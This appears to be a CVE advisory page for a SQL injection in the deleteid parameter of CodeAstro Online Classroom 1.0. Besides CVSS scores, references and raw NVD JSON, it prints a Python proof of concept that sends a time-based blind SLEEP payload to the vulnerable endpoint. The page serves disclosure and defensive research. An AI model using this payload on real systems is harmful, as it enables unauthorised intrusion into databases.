CVE-2026-7745

Description

A vulnerability was determined in CodeAstro Online Classroom 1.0. This impacts an unknown function of the file /OnlineClassroom/facultydetails. This manipulation of the argument deleteid causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

CodeAstro Online Classroom 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def verify_sql_injection(url):
    """This script checks for SQL injection in the deleteid parameter."""
    target_url = f"{url}/OnlineClassroom/facultydetails"
    # Payload to test for time-based blind SQL injection
    payload = "1 AND SLEEP(5)-- -"
    
    params = {
        "deleteid": payload
    }
    
    try:
        print(f"[+] Sending request to: {target_url}")
        response = requests.get(target_url, params=params, timeout=10)
        
        if response.elapsed.total_seconds() >= 5:
            print("[!] Vulnerability confirmed: SQL Injection detected via time delay.")
        else:
            print("[-] Vulnerability not detected or payload failed.")
            
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    verify_sql_injection(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7745
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7745
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7745/
[4] VulDB https://vuldb.com/cve/CVE-2026-7745
[5] https://codeastro.com/
[6] https://github.com/yuji0903/silver-guide/issues/22
[7] https://vuldb.com/submit/807697
[8] https://vuldb.com/vuln/360920
[9] https://vuldb.com/vuln/360920/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7745", "sourceIdentifier": "[email protected]", "published": "2026-05-04T09:16:00.793", "lastModified": "2026-05-04T15:17:58.710", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in CodeAstro Online Classroom 1.0. This impacts an unknown function of the file /OnlineClassroom/facultydetails. This manipulation of the argument deleteid causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]"}, {"url": "https://github.com/yuji0903/silver-guide/issues/22", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/807697", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360920", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360920/cti", "source": "[email protected]"}]}}